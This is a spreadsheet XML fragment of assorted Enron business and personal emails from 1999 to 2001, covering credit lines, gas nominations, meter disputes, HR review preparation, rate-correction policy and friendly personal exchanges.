---------------------- Forwarded by David P Dupre/HOU/ECT on 06/30/2000 10:43 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  James_Naughton@em.fcnbd.com                           06/07/2000 02:19 _x000D_
PM_x000D_
	_x000D_
_x000D_
To: David P Dupre/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Account Status_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hello David,_x000D_
_x000D_
I didn't want to bother you - you're probably more than busy right now._x000D_
_x000D_
In my continuing effort to get your account going, specifically,_x000D_
completing the margin line of credit, I thought the following might_x000D_
help:_x000D_
_x000D_
When Jeff Shankman first told me of Enron's requirement to have a line_x000D_
of credit for margining, nat gas initial margin was $2750 per contract._x000D_
It is now $3850 and likely to rise again.  The 'cheap financing' that_x000D_
our line represents to John Arnold may be even more appealing now (if he_x000D_
has a second to convince Sara Shackleton to work on the documentation)._x000D_
_x000D_
Otherwise, thanks for the intro to Bill White.  We've only spoken_x000D_
briefly so far, but he did say he was trying to free up some time to get_x000D_
something going._x000D_
_x000D_
I'll be in Houston in about two weeks, but I hope to talk to you before_x000D_
then._x000D_
_x000D_
Regards,_x000D_
Jim Naughton_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Oct 1999 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>WSPP conference call</t>
  </si>
  <si>
    <t>call in number is 888 237 7001, access code 501 104_x000D_
talk to you later</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Meter 5892</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with Karen Lindley about volume not being allocated.  She said that _x000D_
she passed it on to Fred Boas._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
02/21/2001 04:46 PM_x000D_
To: Charlene Richmond/HOU/ECT@ECT_x000D_
cc: Fred Boas/HOU/EES@EES, Melissa Graves/HOU/ECT@ECT, Karen _x000D_
Lindley/Corp/Enron@ENRON _x000D_
Subject: Re: Meter 5892  _x000D_
_x000D_
I have done deals with John at this point.  Why are we not being allocated _x000D_
any volume?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
Charlene Richmond_x000D_
02/21/2001 02:59 PM_x000D_
To: Fred Boas/HOU/EES@EES, Daren J Farmer/HOU/ECT@ECT, Melissa _x000D_
Graves/HOU/ECT@ECT_x000D_
cc: Karen Lindley/Corp/Enron@ENRON _x000D_
Subject: Meter 5892_x000D_
_x000D_
I am getting several phone calls from Alpine Resources demanding to be paid _x000D_
for meter 5892 and there is nothing there to be paid.  _x000D_
_x000D_
The person name doing the requesting is John Childers and he said that he _x000D_
spoke to Daren Farmer.  He is looking for 859 mmbtu's for December, 2000 and _x000D_
3,251 mmbtu's for January 2001 .  This is on the Katy Gas Unit.  If anyone _x000D_
would like to talk to John his phone number is 281-646-0232_x000D_
_x000D_
_x000D_
Charlene_x000D_
X31539_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:08:18 -0800 (PST)</t>
  </si>
  <si>
    <t>SCS OPENING NATURAL GAS STRADDLE UPDATE</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - 11_26_01ON.xls </t>
  </si>
  <si>
    <t>Wed, 2 May 2001 02:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>REVISED DRAFT: Enron and Huntco Steel</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Greg Whalley/HOU/ECT on 05/02/2001 09:00 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Eric Thode@ENRON_x000D_
04/30/2001 04:47 PM_x000D_
To: Mark Frevert/Enron@EnronXGate, Greg Whalley/HOU/ECT@ECT, Jeffrey _x000D_
McMahon/Enron@EnronXGate, Raymond Bowen/enron@enronxgate, Mark _x000D_
Koenig/Corp/Enron@ENRON, Paula Rieker/Enron@EnronXGate, Elizabeth _x000D_
Ivers/Enron@EnronXGate, Mark Palmer/Corp/Enron@ENRON, Karen _x000D_
Denne/Corp/Enron@ENRON, Glenn Wright/Enron@EnronXGate_x000D_
cc: Nicki Daw/Enron@EnronXGate, Liz M Taylor/HOU/ECT@ECT, Sue _x000D_
Ford/Enron@EnronXGate, Marsha Schiller/Enron@EnronXGate, Cindy _x000D_
Derecskey/Corp/Enron@Enron _x000D_
Subject: REVISED DRAFT: Enron and Huntco Steel_x000D_
_x000D_
Attached is the latest draft of the Enron/Huntco release.  We are working _x000D_
towards releasing this in the next hour or so, or upon approval of all _x000D_
parties.  If you have questions, please call me at ext. 3-9053._x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Greg Whalley/HOU/ECT on 05/02/2001 09:00 _x000D_
AM ---------------------------_x000D_
From: Michelle Nelson/ENRON@enronXgate on 04/30/2001 08:34 PM_x000D_
To: Greg Whalley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Monday's P&amp;L_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Aug 2001 06:55:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jen_recruiter@yahoo.com'})</t>
  </si>
  <si>
    <t>JENNIFER CATO (corporate/contract recruiter/HR)</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
Hello Jeffrey,_x000D_
I came across your company information as I was conducting research on the Dallas Business Journal website. The article mentioned that Enron was moving into an office complex in Frisco, TX and could potentially employ up to 100 employees. _x000D_
I have recently been laid off as a contract/corporate recruiter with Nortel Networks and am interested in pursuing opportunities with Enron as you grow into your new Frisco location. By bringing my recruiting skills and background in-house as a contract or corporate recruiter, Enron can save thousands of dollars in potential external headhunter fees._x000D_
Attached is my resume for your review and distribution. If you have any questions or require further information, don't hesitate to contact me directly at 214 755 2860 or jen_recruiter@yahoo.com ._x000D_
Jeffrey, thank you for your time and consideration - please re-direct me if there is someone else I need to speak with._x000D_
All the Best,_x000D_
Jennifer Cato_x000D_
_x000D_
Do You Yahoo!?_x000D_
Make international calls  for as low as $0.04/minute with Yahoo! Messenger._x000D_
 - Resume 1[1].doc </t>
  </si>
  <si>
    <t>Mon, 14 May 2001 11:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>nat gas strips as hot links 5/14</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
Nat Gas Summer Strip_x000D_
http://www.carrfut.com/research/Energy1/summerstrip41.pdf_x000D_
Nat Gas Winter Strip_x000D_
http://www.carrfut.com/research/Energy1/winterstrip41.pdf_x000D_
Nat Gas Calendar Strip_x000D_
http://www.carrfut.com/research/Energy1/calendarstrip41.pdf_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 09:35:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'pinto.leite@enron.com', 'harlan.murphy@enron.com', 'peter.del@enron.com', 'brent.hendry@enron.com', 't..hodge@enron.com', 'tanya.rohauer@enron.com', 'david.mitchell@enron.com', 'athena.alexander@enron.com', 'peter.keohane@enron.com', 'rick.antonoff@enron.com', 'steve.van@enron.com', 'elizabeth.sager@enron.com', 'marissa.morelle@enron.com', 'n..gray@enron.com', 'paul.simons@enron.com', 'morris.clark@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'lech.kalembka@enron.com', 'chris.gaffney@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'sara.shackleton@enron.com', 'greg.johnston@enron.com', 'marcus.von@enron.com', 'michael.schuh@enron.com', 'h..douglas@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'rahul.saxena@enron.com', 'alan.aronowitz@enron.com', 'nora.dobin@enron.com', 'lisa.mellencamp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Master Netting Group Meeting</t>
  </si>
  <si>
    <t>A meeting has been scheduled for Wednesday, November 28, 2001 at 10:00 a.m. (CDT) in conference room ECN 791 (Enron Building) to discuss the review of Master Netting Agreement issues.  For those of you participating via conference call, please note the following dial-in information._x000D_
Participant Code:	50731_x000D_
Dial-In No.:	(877) 601-4718 (Domestic); and (712) 271-0570 (International)_x000D_
Thanks._x000D_
Esmeralda Gonzalez_x000D_
Enron Wholesale Services - Legal_x000D_
1400 Smith Street, ECN 3815_x000D_
Houston, Texas 77002_x000D_
E-mail: Esmeralda.Gonzalez@enron.com_x000D_
Phone: 713.345.7621_x000D_
Fax: 713.646.3393</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 08:01:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Direct Deposit</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brown, Ivonne  _x000D_
Sent:	Thursday, May 31, 2001 10:00 AM_x000D_
To:	Scott, Susan M._x000D_
Cc:	Torres, Rebecca_x000D_
Subject:	RE: Direct Deposit_x000D_
_x000D_
Hi Susan,_x000D_
_x000D_
Please forward the completed form along with a voided check to Rebecca Torres.  Rebecca is currently at EB1198 but will be at EB3537a tomorrow. ( I suggest you have someone walk it in.)_x000D_
_x000D_
Thanks,_x000D_
Ivonne _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Scott, Susan M.  _x000D_
Sent:	Thursday, May 31, 2001 9:41 AM_x000D_
To:	Brown, Ivonne_x000D_
Subject:	Direct Deposit_x000D_
_x000D_
Hi Ivonne,_x000D_
_x000D_
I opened up new bank accounts recently and need to set up direct deposit for my pay checks and expense reports.  Could you let me know what all I need to do to have this set up?  I have already filled out the form available on eHRonline.com.  If you could either email me with the instructions or call at ext. 31455 I would appreciate it._x000D_
_x000D_
Thanks,_x000D_
Susan </t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 14:29:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jodis@questar.com', 'gaylenh@questar.com'})</t>
  </si>
  <si>
    <t>FW: Questar - Blanco Hub Schematic</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Gaylen and Jodi,_x000D_
_x000D_
I was having technical difficulty in sending this drawing with the I/C agreement.  Here it is.  Please let us know if you have any questions._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Matthews, Ron  _x000D_
Sent:	Monday, November 26, 2001 3:44 PM_x000D_
To:	Watson, Kimberly; Abdmoulaie, Mansoor_x000D_
Subject:	Questar - Blanco Hub Schematic_x000D_
_x000D_
Attached is a schematic showing the proposed location of the Questar Southern Trails interconnect._x000D_
_x000D_
Ron Matthews_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marilyn.rice@compaq.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Hi...how are you?  Things are going well, but I sure miss you guys !  I left _x000D_
you a vmail last night saying that I can't attend Poli's party.  Jim, Meghan _x000D_
and I are going to be on vacation in California._x000D_
_x000D_
Let's talk soon and think about me when you guys go to Uncle Tongs!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Rice, Marilyn" &lt;Marilyn.Rice@COMPAQ.com&gt; on 07/25/2000 03:43:28 PM_x000D_
To: "'mlokay@enron.com'" &lt;mlokay@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Hi!!_x000D_
_x000D_
_x000D_
Wish you were here!  Can't believe you got away so fast!_x000D_
How's your job - is it you?_x000D_
How's Meghan? (sp right?)  Bring her to Poli's party .... I hope you come._x000D_
_x000D_
Write me and let me know how you're doing when you can.  Did you buy a_x000D_
house?_x000D_
I really miss talking to you (and lunch!).   All my lunch partners are gone._x000D_
Linda's wedding is coming along.  The wedding is planned for Sept. 9 - be_x000D_
here before you know it._x000D_
I hate it that I didn't get to say bye to you - you were always a pleasure_x000D_
to talk to you - always "up" - which is good!_x000D_
BYE - write when you can._x000D_
Marilyn_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 Regards,_x000D_
 Marilyn Rice_x000D_
 Assistant to Linda Bujnis_x000D_
 Director - Operations and Business Planning_x000D_
 MC: 580202 Voice: (281) 927-8455  Fax: (281) 514-1406_x000D_
marilyn.rice@compaq.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 08:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.bush@enron.com', 'lee.papayoti@enron.com', 'kerry.roper@enron.com', 'paul.fox@enron.com', 'james.prentice@enron.com', 'maritta.mullet@enron.com', 'sally.shuler@enron.com', 'gregg.lenart@enron.com', 'robert.lee@enron.com', 'mark.diedrich@enron.com', 'fred.boas@enron.com', 'daren.farmer@enron.com', 'david.johnson@enron.com', 'steven.elliott@enron.com', 'john.nowlan@enron.com', 'thomas.meers@enron.com'})</t>
  </si>
  <si>
    <t>02/00 NATURAL GAS NOMINATION</t>
  </si>
  <si>
    <t>Enron Methanol nominates the following requirements for the Methanol Plant _x000D_
for February 2000:_x000D_
_x000D_
33,000 mmbtu per day_x000D_
_x000D_
EGPFC nominates the following requirements for the MTBE Plant at Morgan's _x000D_
Point for February 2000:_x000D_
_x000D_
10,000 mmbtu per day</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 19:17:42 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: julekort</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. &amp; Mrs. B.A. Kitchen	37 New Walk	Beverley			East Yorkshire	HU17 7DR	United Kingdom	_x000D_
Mr. &amp; Mrs. P.A. Kitchen	3 The Granary	Wilson Road		Hadleigh	Suffolk	IP7 5RO	United Kingdom	_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wallumrod, Ellen  _x000D_
Sent:	Friday, December 07, 2001 4:44 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	julekort _x000D_
_x000D_
hello_x000D_
_x000D_
if you should find the time......_x000D_
_x000D_
could I have your mum and dad's address and also Paul and Caroline's address for Christmas cards ?_x000D_
_x000D_
keep smiling </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 02:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bruce.garner@enron.com'})</t>
  </si>
  <si>
    <t>I Need Your Info on Cheryl Ingstad for Year End Associate PRC_x000D_
 Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I am resending this memo regarding the information that I need from you as _x000D_
Cheryl Ingstad's supervisor as I prepare to represent her in the Associates _x000D_
PRC meeting next week.  I am tied up in other PRC meetings on December 7, 8 _x000D_
and 11, so I am doing my homework earlier rather than later this week.  _x000D_
Please note the bullet points in the memo below which outline the information _x000D_
that I need.  I do have copies of the internal feedback forms and Cheryl's _x000D_
self-evaluation.  Let me know if you have any questions.  I know that things _x000D_
are very busy right now, but it is important to the Associates that their _x000D_
reps in the PRC process are well prepared.  Your input will help me with _x000D_
that.  Thanks. --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 12/04/2000 10:43 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           11/15/2000 12:20 PM_x000D_
	_x000D_
_x000D_
To: David Forster/Corp/Enron@Enron, Elsa Piekielniak/Corp/Enron@Enron, _x000D_
Timothy B Rebhorn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark _x000D_
Knippa/HOU/ECT@ECT, Bruce Garner/LON/ECT@ECT, Federico _x000D_
Cerisoli/SA/Enron@Enron, Robb Justice/Enron Communications@Enron _x000D_
Communications, Rafi Khan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Amanda _x000D_
Colpean/Corp/Enron@Enron, Brad Richter/Enron Communications@Enron _x000D_
Communications, Eduardo Camara/SA/Enron@Enron, Jeff Bartlett/HOU/ECT@ECT, _x000D_
Mark Friedman/HOU/ECT@ECT, Greg Woulfe/Enron Communications@Enron _x000D_
Communications_x000D_
cc: Naveed Ahmed/NA/Enron@Enron, Maria Arefieva/NA/Enron@ENRON, Kim _x000D_
Stanley/NA/Enron@Enron, Justin Chola/Corp/Enron@ENRON, John B _x000D_
Gordon/NA/Enron@Enron, Cheryl Ingstad/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, _x000D_
Erwin Landivar/SA/Enron@Enron, Nicole Palczer/Enron Communications@Enron _x000D_
Communications, Inderpal Singh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Glenn _x000D_
Surowiec/Enron Communications@Enron Communications, Christian _x000D_
Vasconcellos/SA/Enron@Enron, Miguel Vasquez/HOU/ECT@ECT, Jun Wang/Enron _x000D_
Communications@Enron Communications, Grant Zimmerman/Enron _x000D_
Communications@Enron Communications _x000D_
Subject: Preparation for Year End Associate PRC Meeting_x000D_
_x000D_
I will serve as a representative to the  Associates PRC meeting that will _x000D_
take place on December 12.  As a PRC rep, I have been assigned the Associates _x000D_
to represent in the meeting as indicated below.  The Associates Program has _x000D_
provided me with your name as the supervisor of record as of October 1 of the _x000D_
Associate as listed.  _x000D_
_x000D_
_x000D_
_x000D_
Please send the following information to me by December 1.  _x000D_
_x000D_
Associate's accomplishments for the second half of 2000 (prepared by the _x000D_
associate or summarized by you) _x000D_
_x000D_
Description of associate's current responsibilities/assignment (and any _x000D_
additional rotational assignments during this last six months of the year) _x000D_
_x000D_
Pre-ranking of the associate from your business unit PRC , or your suggestion _x000D_
on ranking if no business unit PRC process has been completed (Superior, _x000D_
Excellent, Strong, Satisfactory, Needs Improvement or Issues) _x000D_
_x000D_
Any other information that you believe will be helpful in accurately _x000D_
representing the associate in the PRC process_x000D_
_x000D_
Recommendation for promotion, if any _x000D_
_x000D_
I will receive a copy of the Consolidated Supervisor Feedback from the PEP _x000D_
system through the Associates Program.  _x000D_
_x000D_
I will be at a management conference Thursday and Friday of this week, then _x000D_
on vacation until Monday, November 27.  My assistant, Patti Thompson, will be _x000D_
contacting you next week to arrange a time to meet or talk by phone during _x000D_
the week of November 27 or December 4 to discuss your associate and his/her _x000D_
performance in more detail.  I will also contact the Associates and meet with _x000D_
them individually in preparation for the PRC meeting.  _x000D_
_x000D_
Thanks for your attention to this.  If you are not the appropriate PRC _x000D_
supervisor for the Associate listed above,  please reply by e:mail as soon as _x000D_
possible and my assistant will research where I should go next for this _x000D_
input.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 15:42:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'braun@cmua.org', 'drothrock@cmta.net', 'lga@mother.com', 'jordan@cmua.org', 'wbooth@booth-law.com', 'egarcia@ka-pow.com', 'kent.palmerton@williams.com', 'memcdonald@caiso.com', 'johnf@ncpa.com', 'jstewart@cmta.com', 'brbarkovich@earthlink.net', 'aaron.thomas@aesmail.com', 'hacknece@sce.com', 'carol@iepa.com', 'fieldejr@sce.com', 'vjw@cleanpower.org', 'cmcintyre@sempra.com', 'cra@calretailers.com', 'mikahl@ka-pow.com', 'pcaceo@pacbell.net', 'kgough@calpine.com', 'derek.naten@roche.com', 'kmccrea@sablaw.com', 'dominic.dimare@calchamber.com', 'katherinebrandenburg@flaniganlaw.com', 'kaplan@iepa.com', 'dspeelmon@cmta.net', 'steve_ponder@fpl.com', 'rcavanagh@nrdc.org', 'chowell@sempra.com', 'julee@ppallc.com', 'smutny@iepa.com', 'berry@apx.com', 'kevins@ncpa.com', 'swilson@cmua.org', 'houstgrp@pacbell.net', 'ek@a-klaw.com', 'mdjoseph@adamsbroadwell.com', 'dcarroll@dbsr.com', 'steven@iepa.com', 'sreeder@sppc.com', 'athartmann@duke-energy.com', 'ed@clfp.com', 'mpa@a-klaw.com', 'john.g.larrea@williams.com', 'pstohr@dbsr.com', 'cohnap@sce.com', 'rachel.king@elpaso.com', 'jdasovic@enron.com', 'scarter@nrdc.org', 'pbray@newpower.com', 'kevin.lynch@pacificorp.com', 'mflorio@turn.org', 'jackflanigan@flaniganlaw.com', 'kmills@cfbf.com', 'schoongl@sce.com', 'twinter@caiso.com'})</t>
  </si>
  <si>
    <t>CESG 2002 Plan and Finances</t>
  </si>
  <si>
    <t xml:space="preserve">Folks-_x000D_
Please see attached an important memo regarding the future plans and_x000D_
finances of the CA Energy Solutions Group. Thank you all for a  hectic, but_x000D_
great, year. :-) Happy Holidays!!_x000D_
_x000D_
Many thanks,_x000D_
Delaney_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 03:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gloria.barkowsky@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rates Corrections</t>
  </si>
  <si>
    <t xml:space="preserve">I know where I stand!...._x000D_
Yes, just go ahead and ignore all those emails, and lets start over, ok...._x000D_
_x000D_
1) What is the status of CNG Producing Company  - Deal #77755?  The contract  _x000D_
was called Trag 110, _x000D_
and I see that in the service list on CNG Transmission, but it needs to be _x000D_
pathed starting 07/99 through current._x000D_
Also, the rates are showing up as:_x000D_
Transportation       $.19910     but should be $.06_x000D_
ACA                           $.00220     Should not be paying ACA_x000D_
Compression          $.00000    Should be $.22_x000D_
_x000D_
2)   What is the status of CNG Field Services - Deal #125711 (Marco Pipeline) _x000D_
- Coronado Pipeline  Enterprises?_x000D_
_x000D_
I have more, but do you think that we could get these 2  taken care of _x000D_
today?  Let me know.  Thanks, Gloria 3-7118_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
01/22/2000 10:40 PM_x000D_
To: Gloria G Barkowsky/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Rates Corrections  _x000D_
_x000D_
I bet you think I have been ignoring you, right?  Does this mean I don't have _x000D_
to read all those emails you sent me?_x000D_
_x000D_
_x000D_
_x000D_
Carrie Hollomon_x000D_
01/20/2000 01:39 PM_x000D_
To: Edward Terry/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, Scotty _x000D_
Gilbert/HOU/ECT@ECT, Randall L Gay/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, _x000D_
George Smith/HOU/ECT@ECT, Maria Garza/HOU/ECT@ECT, Theresa _x000D_
Branney/HOU/ECT@ECT, Judy Townsend/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, _x000D_
Dan Junek/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Rates Corrections_x000D_
_x000D_
To summarize the policy set forth below. . ._x000D_
_x000D_
1.  We are going to discontinue correcting rates in Unify/Sitara for for _x000D_
production months older than 12/1999.  This allows us to focus our efforts on _x000D_
current month.  Per Bryce, applaud here! _x000D_
_x000D_
2.  Any adjustments that are required prior to 12/1999 production will be _x000D_
handled directly in UNIFY using manual line items and will not be corrected _x000D_
in SITARA tickets or UNIFY rate tables._x000D_
_x000D_
3.  Beginning with 12/1999 production, all rate issues must be corrected _x000D_
within the SITARA transport tickets and the UNIFY rate tables._x000D_
_x000D_
4.  Do not adjust Unify/Sitara rates issues for periods prior to 12/1999 _x000D_
unless agreed upon by Volume Management coordinator.  Changes should be made _x000D_
effective 12/1999 production forward.  _x000D_
_x000D_
Please let me or rates coordinator know if you have any questions.  If _x000D_
necessary, please forward to your teams._x000D_
Thanks,_x000D_
Carrie_x000D_
_x000D_
---------------------- Forwarded by Carrie Hollomon/HOU/ECT on 01/20/2000 _x000D_
01:23 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bryce Baxter                           01/18/2000 10:31 AM_x000D_
	_x000D_
_x000D_
To: Sherry Anastas/HOU/ECT@ECT, Alfonso Trabulsi/HOU/ECT@ECT, Ron _x000D_
Gaskey/HOU/ECT@ECT, Marlo C James/HOU/ECT@ECT, Christopher _x000D_
Spears/HOU/ECT@ECT, Alton Honore/HOU/ECT@ECT, Hugh Eichelman/HOU/ECT@ECT, _x000D_
Cathy Sprowls/HOU/ECT@ECT, Diana V Monaghan/HOU/ECT@ECT, Mark _x000D_
Feldman/HOU/ECT@ECT, Gloria G Barkowsky/HOU/ECT@ECT, Janet _x000D_
Grebel/Corp/Enron@ENRON_x000D_
cc: Brenda H Fletcher/HOU/ECT@ECT, Jeff Coates/HOU/ECT@ECT, Kimberly S _x000D_
Olinger/HOU/ECT@ECT, Carrie Hollomon/HOU/ECT@ect, Gary Nelson/HOU/ECT@ECT, _x000D_
John Valdes/HOU/ECT@ECT, Susan Harrison/HOU/ECT@ECT _x000D_
Subject: Rates Corrections_x000D_
_x000D_
Per our discussion this morning, we are going to discontinue correcting rates _x000D_
in Unify/Sitara for for production months older than 12/1999.  (Applause _x000D_
here!)  Any adjustments that are required prior to 12/1999 production will be _x000D_
handled via a manual line item.  _x000D_
_x000D_
Manual line items must be entered in the correct contract, production date, _x000D_
etc. and must reflect the correct fee type.  For example, if you are _x000D_
correcting demand, the fee type should be demand, not commodity.  Same _x000D_
applies to cashouts and commodity._x000D_
All Service invoices for all production months through 11/1999 must be _x000D_
corrected manually and finaled by the end of 1/2000 accounting.  Any _x000D_
exceptions need to be discussed with me before we close.  The Rates team will _x000D_
also not make any adjustments on Monday, 1/31.  This should allow you time to _x000D_
redraft and see if any additional manual need to be entered to insure that we _x000D_
close with everything finaled._x000D_
Beginning with 12/1999 production, all rate issues must be corrected within _x000D_
Unify/Sitara.  Any line items booked because the adjustment wasn't made by _x000D_
the Rates team in time to pay the invoice must be corrected in the system and _x000D_
reversed by the end of the same accounting month.  For items that have been _x000D_
identified as manuals that won't be reversed, an explanation needs to be _x000D_
provided to me at the end of the month._x000D_
The rates team will not adjust Unify/Sitara for periods prior to 12/1999 _x000D_
unless agreed upon by the Rates coordinator and the Volume Management _x000D_
coordinator.  They will make their changes effective dated 12/1999 production _x000D_
forward.  _x000D_
_x000D_
Upcoming goal -- we will be working to clear all 1999 tranport OA issues by _x000D_
the end of 2/2000 accounting...  Once the numbers booked in Unify are final, _x000D_
we should be able to resolve the PMA issues we have had outstanding._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Re: New DASH</t>
  </si>
  <si>
    <t xml:space="preserve">Heather,_x000D_
_x000D_
Just go to your DASH form file and pull out language from another deal just _x000D_
like this one.  That's how we handle things on the 38th floor._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heather Kroll@ECT_x000D_
09/28/2000 05:52 PM_x000D_
To: Dan Lyons/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: New DASH_x000D_
_x000D_
Dan and Kay,_x000D_
_x000D_
I've added a sentence about the $2mm penalty payment.  Not sure how to _x000D_
address the regulatory reopener risk._x000D_
_x000D_
Any suggestions?_x000D_
_x000D_
Heather_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 05:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!</t>
  </si>
  <si>
    <t xml:space="preserve">Yep.  Went to Dad's on Sat, left Mon before lunch.  Took my woman and went to _x000D_
Jerry's on July 4th.  Had a good time.  He does a good job cooking on his BBQ _x000D_
pit.  I was very tired on Wed though._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Germany, Mary/COR" &lt;mgermany@CH2M.com&gt; on 07/07/2000 12:22:11 PM_x000D_
To: "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
You do that.  Did you have a nice 4th?_x000D_
_x000D_
Mary Germany, Manager_x000D_
Accounts Payable_x000D_
Payroll_x000D_
Accounting Support_x000D_
(303) 713-2151_x000D_
fax (303) 846-2151_x000D_
email - mgermany@ch2m.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: July 07, 2000 11:21 AM_x000D_
To: Germany, Mary/COR_x000D_
Subject: RE: THINK TWICE BEFORE YOU STOP FOR THE CALL OF NATURE!!!!_x000D_
_x000D_
_x000D_
_x000D_
Not a problem.  She can stuff the little sucker if I get all the other_x000D_
stuff.  I'll start working on that 50 lbs right after I finish this cookie._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
